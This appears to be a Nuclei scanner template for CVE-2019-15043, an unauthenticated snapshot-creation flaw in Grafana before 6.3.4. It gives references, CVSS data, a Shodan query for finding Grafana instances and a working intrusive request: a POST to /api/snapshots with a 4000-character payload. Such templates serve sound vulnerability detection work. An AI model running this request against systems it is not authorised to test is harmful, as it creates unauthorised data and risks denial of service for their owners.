id: CVE-2019-15043

info:
  name: Grafana - Improper Access Control
  author: Joshua Rogers
  severity: high
  description: |
    Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.
  remediation: Upgrade to 6.3.4 or higher.
  reference:
    - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569
    - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
    - https://bugzilla.redhat.com/show_bug.cgi?id=1746945
    - https://aaron-hoffmann.com/posts/cve-2019-15043/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15043
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15043
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2019-15043
    cwe-id: CWE-306
    epss-score: 0.22002
    epss-percentile: 0.95964
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query: title:"Grafana"
  tags: cve,cve2019,grafana,dos,intrusive

variables:
  payload: '{{repeat("A", 4000)}}'

http:
  - method: POST
    path:
      - "{{BaseURL}}/api/snapshots"

    body: '{"dashboard": {"name":"{{payload}}"}}'

    headers:
      Content-Type: "application/json"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"deleteUrl":'
          - '"deleteKey":'
          - '"key":'
          - '"url":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b2ea3e9d104ad5c41c8e9d3a804b4ed187cbad7c0bb5e81fc4043d63e2904243022044782ce250ad37fd6f88f8d6682d9cdf067ae0366b7f860fceb097bce32522d9:922c64590222798bb761d5b6d8e72950